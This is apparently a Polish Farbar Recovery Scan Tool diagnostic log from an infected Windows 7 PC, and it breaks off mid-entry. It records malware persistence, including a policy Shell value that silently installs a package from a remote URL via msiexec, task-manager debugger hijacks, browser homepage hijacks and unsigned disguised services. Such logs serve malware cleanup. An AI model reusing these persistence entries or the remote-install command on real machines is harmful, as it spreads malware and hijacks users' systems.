Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 08-05-2017 Uruchomiony przez Kamcio (administrator) KAMCIO-KOMPUTER (13-05-2017 10:14:00) Uruchomiony z C:\Program1\programy virus Załadowane profile: Kamcio (Dostępne profile: Kamcio) Platform: Windows 7 Ultimate Service Pack 1 (X64) Język: Polski (Polska) Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1") Tryb startu: Normal Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvscpapisvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe (AVAST Software) C:\Users\Kamcio\AppData\Local\background_fault\aswRD.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe (Mozilla Corporation) C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) C:\Program Files (x86)\Firefox\Firefox.exe ==================== Rejestr (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-14] (NVIDIA Corporation) HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [35696 2009-02-27] (Adobe Systems Incorporated) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation) HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-04-26] (Valve Corporation) HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Run: [background_fault] => C:\Users\Kamcio\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SM8NSFdJXRURQRYM4NjVLMjUxNYMyFThWMdH2FTUcOF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Tcpip\Parameters: [DhcpNameServer] 217.172.224.170 89.231.1.206 Tcpip\..\Interfaces\{322BA05B-3C3C-4417-822E-CA0BB35803F3}: [DhcpNameServer] 217.172.224.170 89.231.1.206 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} HKU\S-1-5-21-1286252044-1160479171-464530157-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 HKU\S-1-5-21-1286252044-1160479171-464530157-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp HKU\S-1-5-21-1286252044-1160479171-464530157-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} SearchScopes: HKU\S-1-5-21-1286252044-1160479171-464530157-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} SearchScopes: HKU\S-1-5-21-1286252044-1160479171-464530157-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms} BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2016-02-09] (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-13] (Microsoft Corporation) BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-02-04] (Oracle Corporation) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation) BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-13] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-04] (Oracle Corporation) Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 FireFox: ======== FF ProfilePath: C:\Users\Kamcio\AppData\Roaming\Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887 [2017-05-12] FF Homepage: Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 FF Extension: (Disable Prefetch) - C:\Users\Kamcio\AppData\Roaming\Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887\features\{f443a5a0-3169-4812-9558-5e3f66f2ae66}\disable-prefetch@mozilla.org.xpi [2017-04-05] FF SearchPlugin: C:\Users\Kamcio\AppData\Roaming\Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887\searchplugins\ourluckysites.xml [2017-05-09] FF ProfilePath: C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887 [2017-05-13] FF Homepage: Firefox\Firefox\Profiles\ij5jke03.default-1489678360887 -> about:newtab FF Extension: (SimilarWeb) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-17] [Brak podpisu cyfrowego] FF Extension: (HSearch) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-17] [Brak podpisu cyfrowego] FF Extension: (FF Adr) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [Brak podpisu cyfrowego] FF Extension: (Polski Language Pack) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-03] [Brak podpisu cyfrowego] FF Extension: (Disable Prefetch) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\features\{f443a5a0-3169-4812-9558-5e3f66f2ae66}\disable-prefetch@mozilla.org.xpi [2017-04-05] FF SearchPlugin: C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\searchplugins\startsearch.xml [2017-05-03] FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-03-29] [Brak podpisu cyfrowego] FF HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Kamcio\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi FF Extension: (Ace Stream Web Extension) - C:\Users\Kamcio\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2017-01-31] FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] () FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] () FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-04] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-04] (Oracle Corporation) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-02-09] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-07-11] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-07-11] (NVIDIA Corporation) FF Plugin HKU\S-1-5-21-1286252044-1160479171-464530157-1000: @acestream.net/acestreamplugin,version=3.1.16.1 -> C:\Users\Kamcio\AppData\Roaming\ACEStream\player\npace_plugin.dll [2017-01-13] (Innovative Digital Technologies) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-02-09] (Microsoft Corporation) StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494321453&z=0d8671712f644bc88fff96agbz9t7zbcfo3gez5z0q&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 Chrome: ======= CHR HKU\S-1-5-21-1286252044-1160479171-464530157-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx ==================== Usługi (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-09] (BIT.dll) [Brak podpisu cyfrowego] S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [241936 2016-08-13] (EasyAntiCheat Ltd) S4 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-03] () <==== UWAGA R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-14] (NVIDIA Corporation) R2 IISvr; C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll [105984 2017-05-03] () [Brak podpisu cyfrowego] S4 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] () [Brak podpisu cyfrowego] R2 Kitty; C:\Users\Kamcio\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [Brak podpisu cyfrowego] <==== UWAGA S2 NPASRE; C:\Users\Kamcio\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-14] (NVIDIA Corporation) R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-14] (NVIDIA Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-14] (NVIDIA Corporation) R2 SNARE; C:\Users\Kamcio\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 SNAREA; C:\Users\Kamcio\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S4 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) R2 VNASRE; C:\Users\Kamcio\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] R2 WANARE; C:\Users\Kamcio\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-06-10] (Microsoft Corporation) R2 WinSAPSvc; C:\Users\Kamcio\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [Brak podpisu cyfrowego] <==== UWAGA S2 3DM; C:\Users\Kamcio\AppData\Local\3DM\Kitty.dll [X] S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [X] ===================== Sterowniki (filtrowane) ====================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-14] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation) S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] <==== UWAGA S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] <==== UWAGA S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] <==== UWAGA S1 iSafeNetFilter; system32\DRIVERS\iSafeNetFilter.sys [X] <==== UWAGA S2 MBAMChameleon; \SystemRoot\system32\drivers\MBAMChameleon.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc - utworzone pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-05-13 10:13 - 2017-05-13 10:14 - 00000000 ____D C:\FRST 2017-05-12 20:04 - 2017-05-12 20:04 - 00000000 ____D C:\Windows\system32\appmgmt 2017-05-12 16:46 - 2017-05-12 16:46 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Sun 2017-05-12 16:42 - 2017-05-12 16:42 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Macromedia 2017-05-12 09:57 - 2017-05-13 08:02 - 00000000 ____D C:\Users\Kamcio\AppData\LocalLow\Mozilla 2017-05-11 12:58 - 2017-05-11 14:35 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-11 12:57 - 2017-05-11 14:35 - 00000000 _____ C:\Windows\SysWOW64\00 2017-05-11 12:53 - 2017-05-11 12:57 - 00000000 ____D C:\Users\Kamcio\AppData\Local\NPASRE 2017-05-11 11:37 - 2017-05-11 11:37 - 00000000 ___HD C:\_acestream_cache_ 2017-05-11 11:31 - 2017-05-12 09:44 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\.ACEStream 2017-05-11 11:30 - 2017-05-11 11:30 - 00001986 _____ C:\Users\Kamcio\Desktop\Ace Stream Media Center.lnk 2017-05-11 11:30 - 2017-05-11 11:30 - 00001882 _____ C:\Users\Kamcio\Desktop\Ace Player.lnk 2017-05-11 11:30 - 2017-05-11 11:30 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\ACEStream 2017-05-11 11:30 - 2017-05-11 11:30 - 00000000 ____D C:\Users\Kamcio\AppData\LocalLow\.ACEStream 2017-05-10 22:28 - 2017-05-10 22:28 - 00068590 _____ C:\Users\Kamcio\Desktop\rata2.pdf 2017-05-09 14:10 - 2017-05-12 11:46 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-09 11:14 - 2017-05-09 11:14 - 00000000 ____D C:\Users\Kamcio\AppData\Local\VNASRE 2017-05-08 20:25 - 2017-05-08 20:25 - 00000000 ____D C:\Users\Public\Documents\chrome 2017-05-05 12:19 - 2017-05-12 11:46 - 00001973 _____ C:\Users\Kamcio\Desktop\BigFarm.lnk 2017-05-05 12:15 - 2017-05-05 12:15 - 00000000 ____D C:\Users\Kamcio\AppData\Local\WANARE 2017-05-04 18:24 - 2017-05-12 20:56 - 00000000 ____D C:\Users\Kamcio\AppData\Local\background_fault 2017-05-03 14:35 - 2017-05-03 14:35 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Dayglad 2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Program Files (x86)\IIS 2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Program Files (x86)\Dayglad 2017-05-03 14:32 - 2017-05-11 14:35 - 00000000 _____ C:\Windows\SysWOW64\1111111 2017-05-03 14:32 - 2017-05-05 12:19 - 00003506 _____ C:\Windows\System32\Tasks\Windows-PG 2017-05-03 14:32 - 2017-05-03 14:32 - 00000000 ____D C:\Windows\psgo 2017-05-03 14:32 - 2017-05-03 14:32 - 00000000 ____D C:\Users\Kamcio\AppData\Local\SNAREA 2017-05-03 14:32 - 2017-05-03 14:32 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Kitty 2017-05-02 11:11 - 2017-05-12 11:46 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\WinSAPSvc 2017-05-02 11:11 - 2017-05-02 11:11 - 00000000 ____D C:\Users\Kamcio\AppData\Local\SNARE 2017-04-26 14:35 - 2017-04-26 14:35 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Everness 2017-04-26 14:34 - 2017-04-26 14:34 - 00000000 ____D C:\Program Files (x86)\Everness 2017-04-25 11:55 - 2017-04-25 11:55 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Doeye 2017-04-25 11:55 - 2017-04-25 11:55 - 00000000 ____D C:\Program Files (x86)\Doeye 2017-04-20 17:36 - 2017-04-25 12:00 - 00000000 _____ C:\Windows\SysWOW64\22 2017-04-20 17:34 - 2017-05-11 14:34 - 00000000 _____ C:\Windows\SysWOW64\11 2017-04-19 13:55 - 2017-04-19 13:55 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Dohat 2017-04-19 13:55 - 2017-04-19 13:55 - 00000000 ____D C:\Program Files (x86)\Dohat 2017-04-17 19:24 - 2017-04-17 19:24 - 00067836 _____ C:\Users\Kamcio\Desktop\OTL1111.Txt 2017-04-17 19:24 - 2017-04-17 19:24 - 00000000 ____D C:\Program Files\Malwarebytes 2017-04-17 18:21 - 2017-04-17 18:21 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Google 2017-04-17 18:21 - 2017-04-17 18:21 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Eastness 2017-04-17 17:38 - 2017-04-17 17:38 - 00000000 ____D C:\Windows\system32\log 2017-04-17 17:38 - 2017-04-17 17:38 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Elex-tech 2017-04-17 17:38 - 2017-04-17 17:38 - 00000000 ____D C:\Program Files (x86)\Elex-tech 2017-04-17 17:38 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys 2017-04-17 17:35 - 2017-05-12 15:56 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-04-17 17:35 - 2017-05-03 14:33 - 00002150 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-04-17 17:35 - 2017-04-17 17:35 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Firefox 2017-04-17 17:35 - 2017-04-17 17:35 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Firefox 2017-04-17 17:35 - 2017-04-17 17:35 - 00000000 ____D C:\Program Files (x86)\Eastness 2017-04-17 17:34 - 2017-05-13 07:55 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-04-17 17:34 - 2017-05-12 11:46 - 00003576 _____ C:\Windows\System32\Tasks\Milimili 2017-04-17 17:34 - 2017-04-25 16:59 - 00000000 ____D C:\Program Files (x86)\MIO 2017-04-13 14:19 - 2017-04-13 14:20 - 00003578 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe 2017-04-13 14:18 - 2017-04-13 14:18 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\SSMgre ==================== Jeden miesiąc - zmodyfikowane pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-05-13 08:13 - 2016-08-13 11:36 - 00000000 ____D C:\Program1 2017-05-13 08:00 - 2009-07-14 06:45 - 00029952 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2017-05-13 08:00 - 2009-07-14 06:45 